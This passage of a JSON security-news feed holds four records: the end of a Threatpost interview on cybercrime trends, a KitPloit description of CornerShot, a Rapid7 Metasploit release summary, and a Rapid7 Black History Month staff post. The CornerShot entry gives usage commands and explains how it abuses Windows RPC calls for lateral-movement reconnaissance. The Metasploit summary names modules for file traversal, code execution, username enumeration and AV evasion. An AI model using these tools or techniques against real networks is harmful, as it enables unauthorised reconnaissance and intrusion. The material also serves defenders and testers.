on the back end, and how they would split the revenue. And it also varies. In some cases, they would just split, in other cases, they would just pay for the service, doesn\u2019t matter if they actually got the money from the victim eventually or not. And I guess that that\u2019s also part of whether it\u2019s [as-a-service or an actual collaboration and joint venue](<https://threatpost.com/themoon-botnet-as-a-service/141393/>). But by the way, in some cases, it\u2019s just we even see it with some APT groups that for parts of the attack chain, they would use malware-as-a-service. And it could be just to save on the time and resources in order to create this part of the attack, but also could be for the smokescreen, or for or so that researchers won\u2019t be able to understand who the attackers are because they\u2019re using generic tools. So we are seeing all these types of collaborations between different groups, but it\u2019s not only cyber criminals, it\u2019s also APTs.\n\n**LW: **Right, and regardless, this is not a good thing for the victims, I mean, this is innovation happening across the sphere there on the cybercriminal side of things. So not great for different businesses who are dealing with these attacks, for sure.\n\n**MH: **Yes, but there is also a bright side, because especially mentioning APTs, if they use the same tools used by cyber criminals, maybe these are sometimes tools that are also easier to detect and to block.** **\n\n## **COVID-19 Pandemic: Cybercriminals Shift Lures to Remote Work**\n\n**LW: **Yeah, that\u2019s a really good point, for sure. Now I did want to mention, the ongoing pandemic, we\u2019ve been living with COVID-19 for a while now, and [cybercriminals have certainly kept up with that](<https://threatpost.com/covid-19-vaccine-cyberattacks-credentials-zebrocy/162072/>), unfortunately, been, they\u2019ve been updating their [TTPs and lures](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>) to really tap into the different themes that [we\u2019ve seen with the pandemic](<https://threatpost.com/healthcare-2021-cyberattacks-covid-19-patient-data/161776/>), as well as really the [emotions just on the side of victims](<https://threatpost.com/coronavirus-themed-cyberattacks-drop-microsoft/156635/>). So how have you seen the cybercriminal space evolve over the past year to leverage the pandemic, as well as kind of this shift that we\u2019ve had to remote work?\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/17141540/covid-pharma-mobile-attack.jpg>)\n\n**MH: **So I think it\u2019s mostly about, as you just said, about [remote work and remote users](<https://threatpost.com/work-from-home-opens-new-remote-insider-threats/156841/>), and how to target them or to benefit from the fact that they are that they are not necessarily behind their organization\u2019s security or that there are more ways to connect remotely to a network. So it applies both to the employees but also sometimes to the threat actors. And of course, the fact that everything was happening so fast, necessarily means that at least in some organizations, there were holes in the security.\n\n## **Remote Desktop Protocol as an Initial Attack Vector**\n\nSo what we\u2019ve been seeing is more and more vulnerabilities and exploits for different VPN clients. That\u2019s one important thing. But also more and more attacks on RDP, [remote desktop protocol](<https://threatpost.com/millions-brute-force-attacks-rdp/155324/>). And going back to ransomware, actually, in 2020, most of the ransomware attacks did not even start with emails they started with exploitation of RDP vulnerabilities. So it means the threat actors are indeed, understanding that there\u2019s a new attack, it\u2019s not really a new attack vector, but one that is more robust now and more vulnerable than in the past.\n\n**LW:** Yeah, and that\u2019s, that\u2019s interesting, because I feel like RDP, that is something [that is an attack vector that we\u2019ve seen for a while now](<https://threatpost.com/threat-actors-can-exploit-windows-rdp-servers-to-amplify-ddos-attacks/163248/>). So you know, given that, what are your top security practice recommendations for companies who are continuing to deal with the struggles of remote work, whether it is securing RDP or VPNs, or some of the other attack initial vectors you had mentioned there?\n\n## **Best Cybersecurity Protection Practices for Enterprises**\n\n**MH: **Well, threat vector threat actors exploit vulnerabilities in both technology and in people. So I split my answer into one for the technology part which is making sure of course to do security patches. And for the human being part, or the human error part, is doing awareness, cyber [](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/07/28082542/cybersecurity-threats.jpg>)security awareness to employees is super important, and in many cases neglected. But of course, doing patches and security awareness, we can\u2019t really cover all the attack vectors this way. It\u2019s just impossible. And there are people who are dedicated to security researchers, security companies like Check Point and others. And we make sure to also understand this threat landscape and to cover it in our products. So it\u2019s also very important to also apply appropriate security solutions.\n\n**LW: **Great, those are definitely important pieces of advice. So Maya, thank you so much for coming on to ThreatpostNOW to talk about some of the biggest stat cybercrime trends you\u2019re seeing.\n\n**MH: **Thank you Lindsey.\n\n**LW:** Great. And that to all of our viewers, thank you again for tuning in to ThreatpostNOW. This is Lindsey Welch once again with Maya Horowitz with Check Point, and be sure to catch us on our next episode. Thank you.\n\n**[Check out more Threatpost in-depth video interviews with information security experts and researchers here.](<https://threatpost.com/category/videos/>)**\n", "modified": "2021-02-26T16:22:56", "published": "2021-02-26T16:22:56", "id": "THREATPOST:9EE315DA5D7BF13ACEDB99EDE7B1B945", "href": "https://threatpost.com/malware-gangs-partner-up-in-double-punch-security-threat/164279/", "type": "threatpost", "title": "Malware Gangs Partner Up in Double-Punch Security Threat", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2021-02-27T03:29:49", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-8sb2d52Q60Y/YDSVjvlYggI/AAAAAAAAVcI/utnseqOhDSY4I40-ovKhZsm9xhJyGpqjACNcBGAsYHQ/s1591/cornershot_1_csdemo.gif>)\n\n \n\n\nIn warfare, CornerShot is a weapon that allows a soldier to look past a corner (and possibly take a shot), without risking exposure. Similarly, the CornerShot package allows one to look at a remote host\u2019s network access without the need to have any special privileges on that host. \n\nUsing CornerShot, a ** source ** , with network access to ** carrier ** , can determine whether there is network access between the ** carrier ** and ** target ** for a specific port ** p ** . \n\n \n\n\nFor example, let's assume an red team is trying to propagate from a \"compromised\" source host A, to a target host X, for which host A has no access to. If they propagate through host B, only then they will discover that there is not network access between host B and X. \n\nBy using CornerShot, the team can discover that host C actually has access to target X, so propagation towards target X should go through host C first. \n \n \n +-----+ +-----+ +-----+ \n | | | | filtered | | \n | A +--------> B +----X--->(p) X | \n | | | | | | \n +-----+ +-----+ +-(p)-+ \n source carrier target \n + ^ \n | | \n | +-----+ | \n | | | open | \n +---------->+ C +-------------+ \n | | \n +-----+ \n \n \n \n\nSimilarly to [ nmap ](<https://nmap.org/> \"nmap\" ) , CornerShot differentiates between the following state of ports: _ open _ , _ closed _ , _ filtered _ and _ unknown _ (if it can't be determined). \n\nThe following demo shows running CornerShot against two carriers hosts 172.0.1.12 &amp; 172.0.1.13, in order to determine if the have network access to 192.168.200.1: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-3J0lPVG9-cc/YDSVtxT_s3I/AAAAAAAAVcM/wXtXwK7InNcg0mThcm_9PWpulg86COtzQCNcBGAsYHQ/s1591/cornershot_1_csdemo.gif>)\n\nRead more [ here ](<https://zeronetworks.com/blog/adversary-resilience-via-least-privilege-networking-part-1/> \"here\" ) . \n\n \n** Use Cases ** \n \n** Single Deployment for Complete Network Visibility ** \n\n\nThe seemingly simple task of identifying if some host B in the network has access to host C may require large deployment of network sensors, device agents or collection of a multitude of firewall rules, router configurations and host policies. \n\nCornerShot can simplify this process by using one (or very few) agents that can query other hosts in the network, to determine their access to remote hosts. \n\n \n** Validate [ BloodHound ](<https://www.kitploit.com/search/label/BloodHound> \"BloodHound\" ) Paths ** \n\n\nSecurity teams that utilize BloodHound to find, and mitigate, [ privilege escalation ](<https://www.kitploit.com/search/label/Privilege%20Escalation> \"privilege escalation\" ) paths inside their network, often struggle with millions of logical paths discovered by BloodHound. \n\n[ ShotHound ](<https://github.com/zeronetworks/BloodHound-Tools/tree/main/ShotHound> \"ShotHound\" ) is a tool that integrated CornerShot with BloodHound, in order to discover practical paths that are supported by network access. \n\n \n** Getting Started ** \n\n\nCornerShot can be used as a package, or as a standalone module. The only [ requirements ](<https://www.kitploit.com/search/label/Requirements> \"requirements\" ) are Python 3 and the impacket package. \n\n \n** Installation ** \n\n \n \n pip install cornershot\n\n \n** Standalone Usage ** \n\n\nBasic usage requires [ credentials ](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) from a valid domain user, a FQDN domain, a carrier IP and target IP. \n \n \n python -m cornershot <user> <password> <domain> <carrier> <target>\n\nTo scan a range of carriers against a range of targets, subnets or IP ranges may be used in a comma delimited list: \n \n \n python -m cornershot <user> <password> <domain> 192.168.1.10-192.168.1.20 192.168.5.0/24,192.168.6.0/24\n\nBy default, CornerShot will try to scan the following ports: 135, 445, 3389, 5985, 5986. The user can provide a comma delimited list of ports and port ranges: \n \n \n python -m cornershot -tp 22,8080,45000-45005 <user> <password> <domain> <carrier> <target>\n\n \n** As a Package ** \n\n\nWithin code, one needs to instantiate a CornerShot object with the username, password and domain name of a valid domain user. Adding carriers, target and ports is achieved via the _ add_shots _ method. Once ready, the _ open_fire _ method can be called, which performs only the relevant RPC calls based on the required ports. \n \n \n from cornershot import CornerShot \n cs = CornerShot(\"username\", \"password\", \"fqdn\") \n cs.add_shots(carriers=[\"192.168.1.1\"],targets=[\"192.168.1.2\",\"192.168.1.3\"]) \n results = cs.open_fire()\n\nThe result of _ open_fire _ is a dictionary with keys of carriers, each carrier has another set of keys for targets, and finally, each target holds a dictionary of ports and their respective states. This is an example format of a result: \n \n \n {'carrier_1': \n \t{'target_1': \n \t\t{135: 'unknown', 445: 'filtered', 3389: 'filtered', 5986: 'filtered', 5985: 'filtered'}, \n \t'target_2': \n \t\t{135: 'unknown', 445: 'open', 5985: 'unknown', 5986: 'filtered', 3389: 'open'} \n \t}, \n 'carrier_2': \n \t{'target_1': \n \t\t{3389: 'filtered', 135: 'filtered', 5985: 'filtered', 445: 'filtered', 5986: 'unknown'}, \n \t'target_2': \n \t\t{5985: 'filtered', 5986: 'filtered', 445: 'filtered', 135: 'filtered', 3389: 'open'} \n \t} \n }\n\n \n** How CornerShot Works? ** \n\n\nCornerShot relies on various, well documented, standard Remote Procedure Call (RPC) methods that are used by various Microsoft services. By using methods that only require an authenticated account in the domain, CornerShot is able to trigger network traffic from a carrier host to a target. \n\nCornerShot is able to determine the remote's port state by measuring the time an RPC call took, and using different error codes for each RPC method. \n\n \n** RPC Methods ** \n\n\nThe reader may be familiar with the [ \"printer bug\" ](<https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/41> \"printer bug\" ) , which was discovered by [ Lee Christensen ](<https://twitter.com/tifkin_> \"Lee Christensen\" ) . While it is called a bug, it is a well documented behaviour of the printing service, which allows any authenticated user to coerce a remote server to authenticate to any machine, using the [ RpcRemoteFindFirstPrinterChangeNotificationEx ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d> \"RpcRemoteFindFirstPrinterChangeNotificationEx\" ) method. \n\nCornerShot utilizes the following RPC methods from several Microsoft protocols (there are many additional methods, which will be implemented in future versions): \n\n * RPRN : [ RpcOpenPrinter ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/989357e2-446e-4872-bb38-1dce21e1313f> \"RpcOpenPrinter\" )\n * RRP : [ BaseRegSaveKey ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/f022247d-6ef1-4f46-b195-7f60654f4a0d> \"BaseRegSaveKey\" )\n * EVEN : [ ElfrOpenBELW ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1> \"ElfrOpenBELW\" )\n * EVEN6 : [ EvtRpcOpenLogHandle ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-even6/30a294b1-4e95-468a-a90a-185a5ea63ea0> \"EvtRpcOpenLogHandle\" )\n\nImplementation of the protocols themselves is achieved via the wonderful [ impacket ](<https://github.com/SecureAuthCorp/impacket> \"impacket\" ) package. \n\n \n** RpcOpenPrinter ** \n\n\nThis method receives a [ printerName ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/24fcd124-035c-4988-a858-3a7d8d6f7b43> \"printerName\" ) as parameter. The printerName name can be a path to a local file, a remote file or even to a web printer. By supplying a name that conforms with the WEB_PRINT_SERVER format, it is possible to query any remote port. One example of a web print server name which will trigger HTTP traffic to a remote host and port is: \"http://&lt;target_ip&gt;:&lt;target_port&gt;/printers/ppp/.printer\". \n\n \n** BaseRegSaveKey ** \n\n\nTo utilize this method, we need a two step approach: first, open a [ registry key ](<https://www.kitploit.com/search/label/Registry%20Key> \"registry key\" ) on the remote host - which results with a valid handle, and second, try and save a backup of this handle to a remote file. The BaseRegSaveKey method receives a file path to which it can save a backup of a registry, which triggers SMB traffic over port 445 (and 135 as backup) to a target. The registry key CornerShot opens is the HKEY_CURRENT_USER, which is open for reading by default on most client hosts. \n\n \n** ElfrOpenBELW ** \n\n\nThis function tries to backup Windows events into a file path, which can be remote - in such a case the service will try and access the remote host and path. \n\n \n** EvtRpcOpenLogHandle ** \n\n\nSimilarly to the EVEN method, only this method utilizes a different version of the Windows Events protocol, which is done directly over TCP - no need for SMB port to be open. \n\n \n** Determining Port State ** \n\n\nCornerShot estimates the remote ports' state based on timing factors and error messages received by the RPC method or underlying transport. By experimenting with different Windows hosts and various RPC protocols, we came up with 3 different timing thresholds that prove to work in most network environments. These thresholds are best illustrated with the following figure: \n \n \n + + + \n | | | \n unknown | open / closed | filtered | open \n / | | | \n open | | | \n | | | \n +-------------+------------------+-----------------+--------------+ \n 0 0.5 20 40 Seconds \n MIN FILTERED UPPER \n \n\nThe MIN threshold is 0.5 seconds, responses below this threshold either mean an error in the underlying RPC method or underlying transport, or a response could have been received from the target host. \n\nReplies below FILTERED threshold of 20 seconds could indicate either an open or a closed port, depending on the type of error message received for the method. \n\nReplies between the FILTERED and UPPER threshold of 40 seconds indicate a filtered port for all tested methods (so far...). And requests taking more than the UPPER limit indicate a prolonged open TCP connection. \n\n \n** OS support ** \n\n\nExecuting Corenershot against different OS versions and configurations will yield different results. Not all Windows versions have the same named pipes or behave the same when queried with the same RPC method. Most Windows OOTB will not expose SMB and other RPC services over the network, however, experience has shown that in large environments these ports tend to be open and accessible for most of the assets. \n\nThe following table shows default support for various RPC protocols, given that the appropriate ports are accessible to the carrier host and no configuration changes were made to the host: \n\nOS | Supported RPC Protocols | Required Open Carrier Ports | Possible Target Ports to Scan \n---|---|---|--- \nWindows 7 | EVEN,EVEN6 | 445 / 135 &amp; even6 tcp port | 445* \nWindows 8 | EVEN,EVEN6 | 445 / 135 &amp; even6 tcp port | 445* \nWindows 10 | EVEN,EVEN6,RPRN | 445 / 135 &amp; even6 tcp port | ** ANY ** \nServer 2008 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 &amp; even6 tcp port | 445 \nServer 2012 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 &amp; even6 tcp port | 445 \nServer 2016 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 &amp; even6 tcp port | 445 \nServer 2019 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 &amp; even6 tcp port | 445 \n \n* If Webclient service is running on a client machine, additional ports can be scanned. Currently CornerShot does not support this option. \n\n** RPRN protocol is supported on server hosts, however opening a remote web printer does not work (which is why we can't scan ANY target port) - until we find a workaround \n\n\uf609 \n\n \n** Developers ** \n\n\nAdditional RPC shots, or any other contribution is welcome! \n\nAll RPC methods are implemented under _ /shots _ , and inherit from an abstract class named _ BaseRPCShot _ . The _ /example _ folder shows how to create a custom RPC shot and use it in code. \n\n \n** Contact Us ** \n\n\nWe are happy to hear from you! For bugs, patches, suggestions on this package, please contact us at [email protected] \n\n \n \n\n\n** [ Download Cornershot ](<https://github.com/zeronetworks/cornershot> \"Download Cornershot\" ) **\n", "edition": 1, "modified": "2021-02-26T20:30:10", "published": "2021-02-26T20:30:10", "id": "KITPLOIT:296453770118336339", "href": "http://www.kitploit.com/2021/02/cornershot-amplify-network-visibility.html", "title": "CornerShot - Amplify Network Visibility From Multiple POV Of Other Hosts", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-02-26T20:49:49", "bulletinFamily": "info", "cvelist": ["CVE-2020-17519", "CVE-2021-3156"], "description": "## Hey who finked about Flink?\n\n\n\nIn this week's round of modules, contributor [bcoles](<https://github.com/bcoles>) offered up two modules to leverage that [Apache Flink](<https://flink.apache.org/>) install you found in some fun new ways. If you are just looking to filch a few files, `auxiliary/scanner/http/apache_flink_jobmanager_traversal` leverages [CVE-2020-17519](<https://attackerkb.com/topics/t2rkmB0Uem/cve-2020-17519?referrer=blog>) to pilfer the filesystem on Flink versions 1.11.0 thru 1.11.2. The second module, for a litte extra fun, `exploit/multi/http/apache_flink_jar_upload_exec` utilizes the job functionality in Flink to run arbitrary java code as the web server user, turns out there is a `meterpreter` for that!\n\n## RDP: a dream and a nightmare for the sysAdmin near you.\n\nEver wonder if exposing a remote desktop in a web page was a good idea? I mean, it's just a web server, the internet loves those. Turns out timing attacks can expose your usernames when someone chooses to pay close attention. A recently contributed module `auxiliary/scanner/http/rdp_web_login` contributed by [Matthew Dunn](<https://github.com/k0pak4>) can even pay attention for you. Using the module you can now enumerate users by setting a few options.\n\n# Have you heard of herpaderping?\n\nFor those that have, Metasploit now has a new toy for you. [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) built on some great research by [Johnny Shaw](<https://github.com/jxy-s>), to bring this technique to Metasploit. Using the new `evasion/windows/process_herpaderping` module, you too can generate Windows PE files that hide the code behind the curtain, if you will, when executed on a target.\n\n## Join the community.\n\nFor anyone interested in working with Metasploit in this year's [Google Summer of Code](<https://summerofcode.withgoogle.com/>), you'll have to wait until March 9th to find out if we've been accepted as mentors. However, you can get a head start by checking out our current project [shortlist](<https://github.com/rapid7/metasploit-framework/wiki/GSoC-2021-Project-Ideas>). Said shortlist is still being worked on, and applicants can suggest their own project ideas, so get looking and see what jumps out at you!\n\n## New Modules (4)\n\n * [Apache Flink JobManager Traversal](<https://github.com/rapid7/metasploit-framework/pull/14766>) by 0rich1 - Ant Security FG Lab, [Hoa Nguyen - Suncsr Team](<https://vn.linkedin.com/in/hoanx4>), and [bcoles](<https://github.com/bcoles>), which exploits[CVE-2020-17519](<https://attackerkb.com/topics/t2rkmB0Uem/cve-2020-17519?referrer=blog>), adds an auxiliary module that leverages the directory traversal vulnerability within Apache Flink to recover files from the affected server. This vulnerability does not require authentication.\n * [Apache Flink JAR Upload Java Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14771>) by [Henry Chen](<https://github.com/chybeta>), [bcoles](<https://github.com/bcoles>), and [bigger.wing](<https://github.com/biggerwing>), adds an exploit module that leverages Apache Flink to upload and run an arbitrary JAR file.\n * [Microsoft RDP Web Client Login Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14544>) by [Matthew Dunn](<https://github.com/k0pak4>), adds a scanner module that leverages the timing behavior of the web rdp authentication process to determine valid users.\n * [Process Herpaderping evasion technique](<https://github.com/rapid7/metasploit-framework/pull/14648>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Johnny Shaw](<https://github.com/jxy-s>), adds an evasion module that takes advantage of the Process Herpaderping evasion technique.\n\n## Enhancements and features\n\n * [#14784](<https://github.com/rapid7/metasploit-framework/pull/14784>) from [bcoles](<https://github.com/bcoles>) This fixes a bug in the ScadaBR credential dumping module that prevented it from processing response data.\n\n * [#14617](<https://github.com/rapid7/metasploit-framework/pull/14617>) from [zeroSteiner](<https://github.com/zeroSteiner>) The core Meterpreter and console libraries have been updated to better handle cases where a given implementation of Meterpreter may not support a certain command. Now instead of each version of Meterpreter trying to handle invalid commands, which previously lead to errors, they will instead check if they support that command and then will throw an error message if they do not support that command. Additionally, the output from running the `help` or `?` command inside the `meterpreter` prompt has been updated so as to not display a command that a given Meterpreter implementation does not support. Tests have also been updated accordingly to support checking this functionality works as expected.\n\n * [#14670](<https://github.com/rapid7/metasploit-framework/pull/14670>) from [adfoster-r7](<https://github.com/adfoster-r7>) Word wrapping of Rex tables is now enabled by default for all Rex tables except for those output by the `creds` and `search` commands. This feature can optionally be turned off by issuing the `features set wrapped_tables false` command.\n\n * [#14735](<https://github.com/rapid7/metasploit-framework/pull/14735>) from [adfoster-r7](<https://github.com/adfoster-r7>) Updates have been made to require all new modules to now pass RuboCop and msftidy.rb checks prior to being merged into the framework. These checks will now be run automatically on PRs to detect issues rather than users having to run these tools manually to detect code quality issues within their contributions.\n\n * [#14740](<https://github.com/rapid7/metasploit-framework/pull/14740>) from [zeroSteiner](<https://github.com/zeroSteiner>) This makes a few improvements to the [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>) and adds a couple of features that were left out of the first submission due to time constraints (e.g cleanup and randomisation of the payload library).\n\n## Bugs Fixed\n\n * [#14748](<https://github.com/rapid7/metasploit-framework/pull/14748>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) A bug has been fixed in the `Auxiliary::AuthBrute` that caused a crash when the `DB_ALL_USERS` or `DB_ALL_PASS` options were set. This has now been addressed.\n * [#14789](<https://github.com/rapid7/metasploit-framework/pull/14789>) from [zeroSteiner](<https://github.com/zeroSteiner>) A bug has been fixed whereby Meterpreter sessions were incorrectly being validated due to the fact that TLV encryption for the session would take place before session verification. The fix now considers Meterpreter sessions valid if they successfully negotiate TLV encryption. This fix also removes the `AutoVerifySession` datastore option since all valid Meterpreter instances should negotiate TLV encryption automatically.\n * [#14802](<https://github.com/rapid7/metasploit-framework/pull/14802>) from [dwelch-r7](<https://github.com/dwelch-r7>) A bug within the Kiwi library has been fixed whereby commands passed to Kiwi via the `kiwi_cmd` command in Metasploit where not being properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it two separate commands to execute rather than one space separated command.\n * [#14812](<https://github.com/rapid7/metasploit-framework/pull/14812>) from [dwelch-r7](<https://github.com/dwelch-r7>) Restores missing requires for sock5 proxy support.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.31...6.0.32](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-02-18T05%3A04%3A04-06%3A00..2021-02-25T11%3A27%3A42-06%3A00%22>)\n * [Full diff 6.0.31...6.0.32](<https://github.com/rapid7/metasploit-framework/compare/6.0.31...6.0.32>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-02-26T19:23:43", "published": "2021-02-26T19:23:43", "id": "RAPID7BLOG:46A54401F6ED43B72F664A32EA043CB8", "href": "https://blog.rapid7.com/2021/02/26/metasploit-wrap-up-100/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-26T18:49:49", "bulletinFamily": "info", "cvelist": [], "description": "\n\nBlack History Month is a time for every person, from all different backgrounds to honor and celebrate the achievements of Black and African Americans in the U.S. and their impact on world history. In honor of Black History Month, we would like to recognize some of our amazing team members who have made an impact on our company culture, embody our core values, and exude excellence. We pride ourselves on creating a safe space for everyone to be their authentic selves. Hear what Black History Month means to them!\n\n## Junior Carreira, Service Desk Technician, Boston, MA\n\n\n\n### What does Black History Month mean to you?\n\nBlack History Month to me means an opportunity for the black community to reconnect with their heritage and ancestry while celebrating how our accomplishments and heroes have impacted our ways of being today. It means legacy and continuing to add onto that legacy. It also stands as a reminder of our resilience and that our fight isn't over as long as we\u2019re still here.\n\n### What is one thing that you feel people can do to effect positive change?\n\nI believe that one of the biggest ways that people can make the world a better place is to recognize the humanity/life of others and to respect them for who they are.\n\n### Which film or piece of literature was most impactful or life-changing for you and why?\n\nMy high school unfortunately did not offer a lot of STEM courses, so I took a lot of arts and drama classes. I had a chance to discover a lot of literature that shaped my life today. One of those was a book called, \u201cFreedom Is a Constant Struggle: Ferguson, Palestine, and the Foundations of a Movement,\u201d by Angela Davis. It\u2019s a collection of interviews, scholarly essays, and speeches that cover several different topics that are relevant today, such as Palestine, Ferguson, BLM and mass incarceration. The biggest impact this book had on me is that I learned about how important mass movements can be to effect positive change, and this also helped me learn how to work with others both in school and in life.\n\n### How did you get into cybersecurity?\n\nI\u2019ve always been interested in technology, specifically when it comes to cybersecurity. I got interested in it because my cousin was in the military and then transitioned to a security engineer. I remember asking him a bunch of questions at a young age, even though I never understood anything.\n\n### What was your path to Rapid7?\n\nPrior to Rapid7, I had the opportunity to be part of the 2020 Hack.Diversity cohort, which allowed me to develop and grow my professionalism, leadership, communication, and many other skills. Developing these skills was essential and helped me through my interview process, during my internship, and even now as I continue to grow. Overall, being part of the Hack.Diversity cohort after graduating from UMass Boston with a major in IT created a path for me to Rapid7.\n\n## La-Qiana Perez-Saxon, Legal Counsel, Boston, MA\n\n\n\n### What does Black History Month mean to you?\n\nBlack History Month is a great time for every American to reflect on our past and present in relation to not only the plight, but also the contributions of Black Americans. While I think it is very important to remember the plight of Black people in America and the figures who pioneered change, I also think it is equally important for every American to learn and reflect on the contributions and accomplishments made by many Black Americans. This lack of knowledge is what I believe contributes to the \u201cus vs. them\u201d and \u201cmy country\u201d mentality still plaguing our nation. It logically follows that if someone doesn\u2019t see the person next to them as a meaningful contributor to an accomplishment, they will almost always have difficulty seeing that person as a rightful beneficiary of the resulting fruits.\n\n### What is one thing that you feel people can do to effect positive change?\n\nI think education is truly the key. Black history should not be an optional education topic. Black history is American history, but has been either siloed, or presented as little more than a textbook footnote. This must end. It would be nice to get to a point where we can also ask non-Black individuals what Black History Month means to them, where Black people are truly seen and valued for their contributions to this great nation. Many of us grow up learning about Thomas Edison\u2019s invention of the lightbulb but learn nothing about Lewis Latimer\u2019s 1881 invention of the actual filament that made the lightbulb a success. Learning the role that Black people played in America\u2019s speedy rise to world power will go far in improving the way many Black people are valued and still viewed today.\n\n### Which film or piece of literature was most impactful or life-changing for you and why?\n\nWithout pause, I have to say \u201cThe Allegory of The Cave,\u201d by Plato. As an educated woman of color coming from a severely disadvantaged background, for more reasons than the obvious, I found this reading to be very insightful. It\u2019s a great illustration (albeit fictional) of how a person\u2019s environment can be one of the most powerful forces in forming who they are and how they see the world. Additionally, how without additional knowledge we give others the ability to manipulate us into believing what they will and seeing things as they do. Even more, it highlights the responsibility of those who are fortunate enough to break free from the bondage of the metaphorical cave and experience the splendor that is true freedom. Tim McGraw may have put it best: \u201cWhen you get where you\u2019re going, don\u2019t forget to turn back around and help the next one in line.\u201d\n\n### How did you get into cybersecurity?\n\nAt a time in the industry where cybersecurity was just at its infancy, my first job after leaving college was with a global internet service provider that happened to have a security department. My first role with the company was an Internet Abuse Investigator assisting local, state and federal law enforcement in tracking down people who would utilize the Internet in the commission of a crime. The things I witnessed and accomplished during my time in this role is what really got me hooked into cybersecurity, and ultimately what put me on a path to Rapid7.\n\n## Reuben Williams, Customer Advisor, Arlington, VA\n\n\n\n### What does Black History Month mean to you?\n\nBlack History Month (BHM) is a time to reflect on the struggles, as well as celebrating the resilience and achievements, made by black people. It\u2019s a special period where I can slow myself down and really explore the rich history of people who look like me. It\u2019s also a time when I am humbled and appreciative toward those who blazed the trails that we all now traverse. BHM is joyful and rewarding, understanding that we are all connected, and that BHM is everyone\u2019s history\u2014a history that can truly have a positive impact on the lives of everyone from every race. \n\n### What is one thing that you feel people can do to effect positive change?\n\nBuilding a true dialogue is what first comes to mind. I\u2019m a firm believer that in order to effect positive change, one must be open-minded, objective, and willing enough to listen to those with opposing viewpoints, with the mindset that something can be learned and achieved in such a dialogue. \n\n### **Which film or piece of literature was most impactful of life-changing for you and why?**\n\nA film that has impacted me more than I expected is \u201cHidden Figures.\u201d It\u2019s a film that represents what I believe is an overlooked segment of the population when it comes to role models in film\u2014black women. As a father of a daughter, it was very gratifying watching this film with her where examples of strong and intelligent women exhibited their determination to not allow barriers and challenges from different directions stop them from reaching their goals. These women are true heroes on the big screen as well as in life.\n\n## Terrica Byrd, VP, Change Management, Remote, U.S.\n\n\n\n### What does Black History Month mean to you? \n\nTo me, Black History Month is an opportunity for us to collectively remember and celebrate the sacrifices, contributions, and accomplishments of an amazing and often underappreciated group within our society. As someone who shares this history, it's also a time of great pride and a call to action.\n\n### What is one thing that you feel people can do to effect positive change? \n\nI think the one thing people can do to effect positive change is to embody empathy, personally and professionally. Empathy removes artificial barriers and encourages the desire to understand and meet the needs of others. I can't think of anything more impactful.\n\n### How did you get into cybersecurity?\n\nI had a very specific set of criteria that primarily focused on cultural fit, relevance, and a shared philosophy on organizational change. For me, relevance meant aligning with a global, technology-focused company. I wasn't sure this really existed, but Rapid7 checked all of the boxes. The fact that it's cybersecurity is icing on the cake! I feel very fortunate to do the work that I love for a company that I believe in and an industry that has no limits. \n \nInterested in learning more about our culture and commitment to driving change? Check out the [progress we\u2019ve made on diversity, equity and inclusion](<https://www.rapid7.com/globalassets/_pdfs/rapid7-2020-DEI-report.pdf>).", "modified": "2021-02-26T15:58:25", "published": "2021-02-26T15:58:25", "id": "RAPID7BLOG:EAC8F69A452B080E26017112AD3F9DEF", "href": "https://blog.rapid7.com/2021/02/26/celebrating-black-history-today-and-every-day/", "type": "rapid7blog", "title": "Celebrating Black History Today and Every Day", "cvss": {"score": 0.0, "vector": "NONE"}}]}